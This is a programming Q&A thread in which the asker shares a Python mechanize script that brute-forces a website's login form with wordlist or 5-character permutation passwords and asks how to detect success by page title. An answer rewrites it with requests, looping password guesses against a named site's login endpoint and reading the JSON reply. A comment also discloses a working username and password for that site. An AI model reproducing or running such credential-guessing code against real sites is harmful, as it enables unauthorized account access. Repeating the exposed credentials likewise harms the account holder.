Python - mechanize/requests get Title

Question

So, I have this brute-forcing script, that basically brute-forces web forms. Say my example site's web-form redirects to the same URL when logged in successfully or not. For example, to login I'd have to go to this site: https://example.com/account/, when I type a wrong username/password, it doesn't change the URL of the page. Everything stays the same. And if I DO type the correct username & password, it changes the page title, but the URL still stays the same.

I want to change: response.geturl() --> response.gettitle() But I'm not sure what's the correct attribute for this.

My Code:

#!/usr/bin/python
import mechanize
import itertools
import sys
import os

br = mechanize.Browser()
br.set_handle_equiv(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
ua = 'Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 (compatible;)'
br.addheaders = [('User-Agent', ua), ('Accept', '*/*')]

if len(sys.argv) > 1:
    if os.path.exists(sys.argv[1]):
        combos = [line.strip() for line in open(sys.argv[1])]
    else:
        print "[-] File not found"
        sys.exit()
else:
    combos = itertools.permutations("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",5)

r = br.open("https://example.com/account/")

for x in combos:
    br.select_form(nr = 0)
    br.form['login'] = "my_username"
    br.form['pass'] = ''.join(x)
    print "\033[1;33;48mChecking:"+"\033[1;34;48m",br.form['pass']
    response = br.submit()
    if response.geturl()=="https://example.com/account/":
    #if response.gettitle()==...
        print ""
        print "\033[1;32;48mPassword found:"+"\033[1;36;48m",''.join(x)
        break

Doesn't work: AttributeError: closeable_response instance has no attribute 'title' — Coto TheArcher, Jun 24 '16 at 15:12
Have a look at http://stackoverflow.com/questions/11531958/verifying-br-submit-using-pythons-mechanize-module — Arpan, Jun 24 '16 at 15:13
@Arpan I tried: print br.title() and it printed the title. But how can I print the title after: response = br.submit() ? For URL, it was response.geturl(), but for the title it doesn't work. — Coto TheArcher, Jun 24 '16 at 15:48
@PadraicCunningham Because I'm trying to get this brute-forcing script to work for my site. — Coto TheArcher, Jun 24 '16 at 15:56
@PadraicCunningham As I said to Arpan;I tried: print br.title() and it printed the title. But how can I print the title after: response = br.submit() ? For URL, it was response.geturl(), but for the title it doesn't work. — Coto TheArcher, Jun 24 '16 at 16:07
You will need to parse the html returned, use bs4 and indeed this would probably be a lot easier using requests — Padraic Cunningham, Jun 24 '16 at 16:08
@PadraicCunningham Again, this is like br.title() - it prints the title of the page, BEFORE br.submit(). — Coto TheArcher, Jun 24 '16 at 16:25
Can you share the url so at least we know what the server is doing? — Padraic Cunningham, Jun 24 '16 at 16:27
@PadraicCunningham https://bagar.io/en/account/ - An example, working username/password: user: Coto123 pass: MCoto_16 . When I login normally, it changes the title from "Authorization" to "Bagar.io Your personal area". — Coto TheArcher, Jun 24 '16 at 17:27

Padraic Cunningham · Answer 1 · 2016-06-24T17:49:35.800

1

This is very simple with requests:

import requests
data ={"login":"yourlogin",
"pass": "yourpass"}


r = requests.post("https://bagar.io/engine/modules/login.php", data=data)
print("success" in r.json())

A successful login returns {u'success': u'allow'} and an unsuccessful return {u'error':lot of unicode...}.

So just keep passing login data:

    for x in combos:
        data = {"login":"my_username",
                "pass":"".join(x)}
        r = requests.post("https://bagar.io/engine/modules/login.php", data=data)
        print("success" in r.json())

edited Jun 24 '16 at 17:49

answered Jun 24 '16 at 17:36

Padraic Cunningham

176,452
29
245
321

Can you edit your post and make the script like the one I posted above? Meaning it can technically brute-force the web-form if it wanted. – Coto TheArcher Jun 24 '16 at 17:42
Do I really need: br.select_form(nr = 0) ? – Coto TheArcher Jun 24 '16 at 17:48
Nope, left over from copy paste – Padraic Cunningham Jun 24 '16 at 17:49
@CotoTheArcher, you realise your own code does not successfully login? – Padraic Cunningham Jun 24 '16 at 21:20
How come does it fail to login? – Coto TheArcher Jun 24 '16 at 22:43
How come does it fail to login? @Padraic Cunningham – Coto TheArcher Jun 30 '16 at 12:25

Python - mechanize/requests get Title

1 Answers1